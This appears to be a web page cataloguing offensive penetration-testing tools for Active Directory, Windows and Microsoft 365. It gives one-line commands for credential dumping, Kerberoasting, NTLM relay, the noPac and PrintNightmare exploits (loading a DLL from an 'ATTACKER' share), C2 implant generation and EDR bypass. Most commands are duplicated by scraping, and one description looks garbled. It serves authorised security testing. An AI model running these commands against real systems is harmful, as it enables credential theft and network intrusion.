Internal Pentest Tools Arsenal
Comprehensive toolkit for Active Directory attacks, lateral movement, privilege escalation, credential harvesting, and defense evasion. Organized by attack phase for quick reference during engagements.
Information
nxc.
🔍 Enumeration & Reconnaissance
BloodHound / SharpHound
AD EnumerationGraph-based AD relationship mapper. Identifies attack paths from any user to Domain Admin via ACLs, group memberships, sessions, and delegation.
Installation
SharpHound.exe -c All,GPOLocalGroup --zipfilename bh.zipSharpHound.exe -c All,GPOLocalGroup --zipfilename bh.zipNetExec (nxc)
Multi-ProtocolSwiss army knife for network pentesting. Replaces nxc. SMB/LDAP/MSSQL/WinRM/RDP/SSH enumeration, spraying, command execution.
Installation
pipx install netexecpipx install netexecPowerView
AD EnumerationPowerShell AD enumeration — users, groups, ACLs, GPOs, trusts, delegation, SPNs. The gold standard for AD recon.
Installation
Import-Module .PowerView.ps1; Get-DomainUserImport-Module .PowerView.ps1; Get-DomainUserldapdomaindump
LDAPActive Directory information dumper via LDAP. Exports users, groups, computers, policies as HTML and JSON.
Installation
ldapdomaindump -u 'DOMAIN\user' -p 'Pass' ldap://DC-IPldapdomaindump -u 'DOMAIN\user' -p 'Pass' ldap://DC-IPenum4linux-ng
SMB/RPCNext-gen Windows/SMB enumeration tool. Null sessions, shares, users, groups, password policies via RPC/LDAP/SMB.
Installation
enum4linux-ng -A target-ipenum4linux-ng -A target-ipADRecon
AD EnumerationGathers extensive AD data into Excel/CSV — users, computers, GPOs, ACLs, LAPS, trusts. Great for reporting.
Installation
.ADRecon.ps1 -OutputType XLSX.ADRecon.ps1 -OutputType XLSX🔐 Credential Attacks
Responder
Man-in-the-MiddleLLMNR/NBT-NS/MDNS poisoner. Captures NTLMv1/v2 hashes from multicast name resolution on the local network.
Installation
responder -I eth0 -wFbresponder -I eth0 -wFbMimikatz
Credential DumpingThe credential extraction tool. LSASS dumping, Kerberos ticket extraction, DPAPI decryption, DCSync, golden/silver tickets.
Installation
sekurlsa::logonpasswordssekurlsa::logonpasswordsRubeus
KerberosC# Kerberos abuse toolkit — AS-REP roasting, Kerberoasting, S4U, delegation abuse, ticket forging, and pass-the-ticket.
Installation
Rubeus.exe kerberoast /outfile:hashes.txtRubeus.exe kerberoast /outfile:hashes.txtImpacket
Multi-PurposePython network protocol library. Includes secretsdump (DCSync), ntlmrelayx (relay), psexec/wmiexec/smbexec, GetUserSPNs, and 50+ tools.
Installation
pip install impacketpip install impackethashcat
Password CrackingGPU-accelerated password cracker. Supports 300+ hash types including NTLM, NTLMv2, Kerberoast, AS-REP, and NetNTLM.
Installation
hashcat -m 13100 hashes.txt wordlist.txt -r rules/best64.rulehashcat -m 13100 hashes.txt wordlist.txt -r rules/best64.ruleCoercer
CoercionAutomatically finds and exploits Windows authentication coercion vulnerabilities (PetitPotam, PrinterBug, DFSCoerce, ShadowCoerce).
Installation
coercer coerce -u user -p pass -t DC-IP -l LISTEN-IPcoercer coerce -u user -p pass -t DC-IP -l LISTEN-IPntlmrelayx (Impacket)
RelayNTLM relay attack tool. Relays captured authentication to SMB, LDAP, MSSQL, HTTP, ADCS. Supports RBCD and shadow credentials.
Installation
ntlmrelayx.py -t ldap://DC-IP --delegate-accessntlmrelayx.py -t ldap://DC-IP --delegate-accessSharpDPAPI
Credential HarvestingC# DPAPI abuse — decrypt browser passwords, credential blobs, and vault entries using user/machine/domain keys.
Installation
SharpDPAPI.exe triageSharpDPAPI.exe triage💥 Exploitation
Certipy
ADCSAD Certificate Services enumeration and abuse. Finds and exploits ESC1-ESC13 misconfigurations for domain privilege escalation.
Installation
certipy find -u user@corp.local -p Pass -dc-ip DC-IP -vulnerablecertipy find -u user@corp.local -p Pass -dc-ip DC-IP -vulnerableWhisker
Shadow CredentialsShadow Credentials attack tool. Adds msDS-KeyCredentialLink to target accounts for certificate-based authentication.
Installation
Whisker.exe add /target:victim /domain:corp.localWhisker.exe add /target:victim /domain:corp.localKrbRelayUp
Privilege EscalationOne-click local privilege escalation via Kerberos relay. Combines RBCD + S4U for SYSTEM from any domain user.
Installation
KrbRelayUp.exe relay -Domain corp.local -CreateNewComputerAccount -ComputerName YOURPC$ -ComputerPassword PassKrbRelayUp.exe relay -Domain corp.local -CreateNewComputerAccount -ComputerName YOURPC$ -ComputerPassword PassnoPac (SAMAccountName)
CVE ExploitExploits CVE-2021-42278/42287. Impersonate Domain Controller via SAMAccountName spoofing for instant DA.
Installation
noPac.py corp.local/user:Pass -dc-ip DC-IP --impersonate administrator -dumpnoPac.py corp.local/user:Pass -dc-ip DC-IP --impersonate administrator -dumpPetitPotam
CoercionCoerces Windows hosts to authenticate via MS-EFSRPC. Chain with ntlmrelayx to ADCS for domain takeover.
Installation
petitpotam.py LISTEN-IP DC-IPpetitpotam.py LISTEN-IP DC-IPPrintNightmare
CVE ExploitCVE-2021-34527 — Remote code execution via Windows Print Spooler for instant SYSTEM on unpatched hosts.
Installation
CVE-2021-1675.py corp.local/user:Pass@TARGET '\\ATTACKER\share\evil.dll'CVE-2021-1675.py corp.local/user:Pass@TARGET '\\ATTACKER\share\evil.dll'🔄 Lateral Movement & Remote Access
Evil-WinRM
Remote AccessFeature-rich WinRM shell — file upload/download, PowerShell, DLL loading, log evasion. The go-to for Windows remote access.
Installation
evil-winrm -i TARGET -u admin -H NTLM_HASHevil-winrm -i TARGET -u admin -H NTLM_HASHpsexec / smbexec / wmiexec
Remote ExecutionImpacket remote execution suite. PsExec (service), SMBExec (no disk write), WMIExec (stealthier). All support pass-the-hash.
Installation
wmiexec.py -hashes :NTLM corp.local/admin@TARGETwmiexec.py -hashes :NTLM corp.local/admin@TARGETatexec / dcomexec
Remote ExecutionImpacket alternatives for lateral movement via Task Scheduler (atexec) or DCOM (dcomexec). Less commonly monitored.
Installation
atexec.py corp.local/admin:Pass@TARGET 'whoami'atexec.py corp.local/admin:Pass@TARGET 'whoami'SharpRDP
Remote AccessRemote Desktop Protocol command execution. Authenticates via RDP and sends keystrokes for stealthy execution.
Installation
SharpRDP.exe computername=TARGET command='cmd /c whoami' username=admin password=PassSharpRDP.exe computername=TARGET command='cmd /c whoami' username=admin password=Pass🏴 Post-Exploitation & Privilege Escalation
WinPEAS
Privilege EscalationWindows privilege escalation enumeration — services, registry, credentials, scheduled tasks, DLL hijack opportunities.
Installation
winpeas.exe quiet servicesinfowinpeas.exe quiet servicesinfoSeatbelt
Situational AwarenessGhostPack C# security audit tool — system info, credentials, browser data, installed software, and security product detection.
Installation
Seatbelt.exe -group=all -fullSeatbelt.exe -group=all -fullLaZagne
Credential HarvestingRetrieves passwords stored on a local computer — browsers, databases, mail, Wi-Fi, sysadmin tools, and more.
Installation
lazagne.exe alllazagne.exe allSharpUp
Privilege EscalationC# port of PowerUp. Finds common Windows privilege escalation vectors: misconfigured services, unquoted paths, modifiable binaries.
Installation
SharpUp.exe auditSharpUp.exe audit🛡️ Defense Evasion
ScareCrow
Payload GenerationPayload creation framework for side-loading. EDR bypass via signed DLLs, process injection, and syscall obfuscation.
Installation
ScareCrow -I beacon.bin -Loader dll -domain microsoft.comScareCrow -I beacon.bin -Loader dll -domain microsoft.comNim / NimPackt-v2
Payload DevelopmentNim-based payload framework. Compiles to native Windows binaries with low AV detection rates.
Installation
python3 NimPackt.py -e shinject -i beacon.bin -t csharppython3 NimPackt.py -e shinject -i beacon.bin -t csharpBOF.NET / Cobalt Strike BOFs
In-Memory ExecutionBeacon Object Files — in-memory .NET execution and custom BOFs for EDR evasion within C2 frameworks.
Installation
# Load via C2 beacon# Load via C2 beaconEDRSandBlast
Kernel BypassKernel-level EDR bypass via vulnerable drivers (BYOVD). Removes kernel callbacks, ETW providers, and minifilter altitudes.
Installation
EDRSandblast.exe --usermode --kernelmodeEDRSandblast.exe --usermode --kernelmode🌐 Pivoting & C2 Frameworks
Ligolo-ng
PivotingAdvanced tunneling/pivoting tool using TUN interface. Creates transparent network tunnels without SOCKS proxies.
Installation
# Proxy: ligolo-proxy -selfcert
# Agent: ligolo-agent -connect PROXY:11601 -retry# Proxy: ligolo-proxy -selfcert
# Agent: ligolo-agent -connect PROXY:11601 -retrySliver
C2 FrameworkOpen-source C2 framework. HTTP(S)/mTLS/WireGuard/DNS implants, BOF support, traffic encryption, pivoting.
Installation
sliver > generate --mtls LISTEN_IP --os windows --save implant.exesliver > generate --mtls LISTEN_IP --os windows --save implant.exeHavoc
C2 FrameworkModern C2 framework with demon agents. Sleep obfuscation, indirect syscalls, token manipulation, and BOF execution.
Installation
# Build and run Havoc teamserver# Build and run Havoc teamserverchisel
PivotingFast TCP/UDP tunnel over HTTP with SSH. Port forwarding and SOCKS5 proxy through restricted networks.
Installation
# Server: chisel server --reverse -p 8080
# Client: chisel client PROXY:8080 R:socks# Server: chisel server --reverse -p 8080
# Client: chisel client PROXY:8080 R:socks☁️ Cloud & Hybrid Identity
AADInternals
Azure ADAzure AD / Entra ID toolkit. Tenant recon, PTA backdoors, Seamless SSO abuse, AAD Connect credential extraction.
Installation
Import-Module AADInternals; Invoke-AADIntReconAsOutsider -DomainName corp.comImport-Module AADInternals; Invoke-AADIntReconAsOutsider -DomainName corp.comROADtools
Azure ADAzure AD enumeration framework. Dumps users, groups, service principals, apps, conditional access, and device registrations.
Installation
roadrecon auth -u user@corp.com -p Pass; roadrecon gather; roadrecon guiroadrecon auth -u user@corp.com -p Pass; roadrecon gather; roadrecon guiGraphRunner
M365Post-exploitation framework for Microsoft Graph API. Token manipulation, email access, Teams messages, and SharePoint enumeration.
Installation
Import-Module .GraphRunner.ps1; Get-GraphTokensImport-Module .GraphRunner.ps1; Get-GraphTokensTeamFiltration
M365Cross-platform framework for enumerating, spraying, exfiltrating, and backdooring Microsoft 365 / Teams accounts.
Installation
TeamFiltration.exe --outpath results --enum --domain corp.comTeamFiltration.exe --outpath results --enum --domain corp.com📚 Recommended Books
Essential command references to keep within arm's reach during engagements.
Black Hat Python, 2nd Edition
Justin Seitz & Tim Arnold (2021)
Build custom pentest tools in Python — network sniffers, credential harvesters, C2 implants, and automation scripts.
Operator Handbook
Joshua Picolet
Red/Blue/OSINT command reference in a field-manual format. Quick-reference commands for every phase of an engagement.
As an Amazon Associate I earn from qualifying purchases.